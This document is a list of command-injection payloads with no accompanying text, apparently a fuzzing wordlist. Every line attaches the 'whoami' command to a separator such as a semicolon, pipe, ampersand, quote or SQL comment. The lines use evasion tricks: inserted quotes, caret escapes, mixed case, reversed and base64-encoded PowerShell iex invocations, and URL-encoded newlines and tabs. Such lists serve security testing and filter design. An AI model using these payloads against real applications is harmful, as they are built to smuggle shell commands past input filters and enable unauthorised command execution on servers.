'whoami
,whoami
;whoami
-- whoami
/*whoami
*/whoami
*whoami
( )whoami
& whoami
&&whoami
|whoami
||whoami
'w'h'o'am'i
,w'h'o'am'i
;w'h'o'am'i
-- w'h'o'am'i
/*w'h'o'am'i
*/w'h'o'am'i
*w'h'o'am'i
( )w'h'o'am'i
& w'h'o'am'i
&&w'h'o'am'i
|w'h'o'am'i
||w'h'o'am'i
'w"h"o"am"i
,w"h"o"am"i
;w"h"o"am"i
-- w"h"o"am"i
/*w"h"o"am"i
*/w"h"o"am"i
*w"h"o"am"i
( )w"h"o"am"i
& w"h"o"am"i
&&w"h"o"am"i
|w"h"o"am"i
||w"h"o"am"i
'who^ami
,who^ami
;who^ami
-- who^ami
/*who^ami
*/who^ami
*who^ami
( )who^ami
& who^ami
&&who^ami
|who^ami
||who^ami
'WhOaMi
,WhOaMi
;WhOaMi
-- WhOaMi
/*WhOaMi
*/WhOaMi
*WhOaMi
( )WhOaMi
& WhOaMi
&&WhOaMi
|WhOaMi
||WhOaMi
'iex "$('imaohw'[-1..-20] -join '')"
,iex "$('imaohw'[-1..-20] -join '')"
;iex "$('imaohw'[-1..-20] -join '')"
-- iex "$('imaohw'[-1..-20] -join '')"
/*iex "$('imaohw'[-1..-20] -join '')"
*/iex "$('imaohw'[-1..-20] -join '')"
*iex "$('imaohw'[-1..-20] -join '')"
( )iex "$('imaohw'[-1..-20] -join '')"
& iex "$('imaohw'[-1..-20] -join '')"
&&iex "$('imaohw'[-1..-20] -join '')"
|iex "$('imaohw'[-1..-20] -join '')"
||iex "$('imaohw'[-1..-20] -join '')"
'iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
,iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
;iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
-- iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
/*iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*/iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
( )iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
& iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&&iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
|iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
||iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
'whoami
,whoami
;whoami
--%0awhoami
/*whoami
*/whoami
*whoami
(%0a)whoami
&%0awhoami
&&whoami
|whoami
||whoami
'w'h'o'am'i
,w'h'o'am'i
;w'h'o'am'i
--%0aw'h'o'am'i
/*w'h'o'am'i
*/w'h'o'am'i
*w'h'o'am'i
(%0a)w'h'o'am'i
&%0aw'h'o'am'i
&&w'h'o'am'i
|w'h'o'am'i
||w'h'o'am'i
'w"h"o"am"i
,w"h"o"am"i
;w"h"o"am"i
--%0aw"h"o"am"i
/*w"h"o"am"i
*/w"h"o"am"i
*w"h"o"am"i
(%0a)w"h"o"am"i
&%0aw"h"o"am"i
&&w"h"o"am"i
|w"h"o"am"i
||w"h"o"am"i
'who^ami
,who^ami
;who^ami
--%0awho^ami
/*who^ami
*/who^ami
*who^ami
(%0a)who^ami
&%0awho^ami
&&who^ami
|who^ami
||who^ami
'WhOaMi
,WhOaMi
;WhOaMi
--%0aWhOaMi
/*WhOaMi
*/WhOaMi
*WhOaMi
(%0a)WhOaMi
&%0aWhOaMi
&&WhOaMi
|WhOaMi
||WhOaMi
'iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
,iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
;iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
--%0aiex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
/*iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
*/iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
*iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
(%0a)iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
&%0aiex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
&&iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
|iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
||iex%0a"$('imaohw'[-1..-20]%0a-join%0a'')"
'iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
,iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
;iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
--%0aiex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
/*iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*/iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
(%0a)iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&%0aiex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&&iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
|iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
||iex%0a"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
'whoami
,whoami
;whoami
--%09whoami
/*whoami
*/whoami
*whoami
(%09)whoami
&%09whoami
&&whoami
|whoami
||whoami
'w'h'o'am'i
,w'h'o'am'i
;w'h'o'am'i
--%09w'h'o'am'i
/*w'h'o'am'i
*/w'h'o'am'i
*w'h'o'am'i
(%09)w'h'o'am'i
&%09w'h'o'am'i
&&w'h'o'am'i
|w'h'o'am'i
||w'h'o'am'i
'w"h"o"am"i
,w"h"o"am"i
;w"h"o"am"i
--%09w"h"o"am"i
/*w"h"o"am"i
*/w"h"o"am"i
*w"h"o"am"i
(%09)w"h"o"am"i
&%09w"h"o"am"i
&&w"h"o"am"i
|w"h"o"am"i
||w"h"o"am"i
'who^ami
,who^ami
;who^ami
--%09who^ami
/*who^ami
*/who^ami
*who^ami
(%09)who^ami
&%09who^ami
&&who^ami
|who^ami
||who^ami
'WhOaMi
,WhOaMi
;WhOaMi
--%09WhOaMi
/*WhOaMi
*/WhOaMi
*WhOaMi
(%09)WhOaMi
&%09WhOaMi
&&WhOaMi
|WhOaMi
||WhOaMi
'iex%09"$('imaohw'[-1..-20]%09-join%09'')"
,iex%09"$('imaohw'[-1..-20]%09-join%09'')"
;iex%09"$('imaohw'[-1..-20]%09-join%09'')"
--%09iex%09"$('imaohw'[-1..-20]%09-join%09'')"
/*iex%09"$('imaohw'[-1..-20]%09-join%09'')"
*/iex%09"$('imaohw'[-1..-20]%09-join%09'')"
*iex%09"$('imaohw'[-1..-20]%09-join%09'')"
(%09)iex%09"$('imaohw'[-1..-20]%09-join%09'')"
&%09iex%09"$('imaohw'[-1..-20]%09-join%09'')"
&&iex%09"$('imaohw'[-1..-20]%09-join%09'')"
|iex%09"$('imaohw'[-1..-20]%09-join%09'')"
||iex%09"$('imaohw'[-1..-20]%09-join%09'')"
'iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
,iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
;iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
--%09iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
/*iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*/iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
(%09)iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&%09iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&&iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
|iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
||iex%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
'whoami
,whoami
;whoami
--%0a%09whoami
/*whoami
*/whoami
*whoami
(%0a%09)whoami
&%0a%09whoami
&&whoami
|whoami
||whoami
'w'h'o'am'i
,w'h'o'am'i
;w'h'o'am'i
--%0a%09w'h'o'am'i
/*w'h'o'am'i
*/w'h'o'am'i
*w'h'o'am'i
(%0a%09)w'h'o'am'i
&%0a%09w'h'o'am'i
&&w'h'o'am'i
|w'h'o'am'i
||w'h'o'am'i
'w"h"o"am"i
,w"h"o"am"i
;w"h"o"am"i
--%0a%09w"h"o"am"i
/*w"h"o"am"i
*/w"h"o"am"i
*w"h"o"am"i
(%0a%09)w"h"o"am"i
&%0a%09w"h"o"am"i
&&w"h"o"am"i
|w"h"o"am"i
||w"h"o"am"i
'who^ami
,who^ami
;who^ami
--%0a%09who^ami
/*who^ami
*/who^ami
*who^ami
(%0a%09)who^ami
&%0a%09who^ami
&&who^ami
|who^ami
||who^ami
'WhOaMi
,WhOaMi
;WhOaMi
--%0a%09WhOaMi
/*WhOaMi
*/WhOaMi
*WhOaMi
(%0a%09)WhOaMi
&%0a%09WhOaMi
&&WhOaMi
|WhOaMi
||WhOaMi
'iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
,iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
;iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
--%0a%09iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
/*iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
*/iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
*iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
(%0a%09)iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
&%0a%09iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
&&iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
|iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
||iex%0a%09"$('imaohw'[-1..-20]%0a%09-join%0a%09'')"
'iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
,iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
;iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
--%0a%09iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
/*iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*/iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
*iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
(%0a%09)iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&%0a%09iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
&&iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
|iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
||iex%0a%09"$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
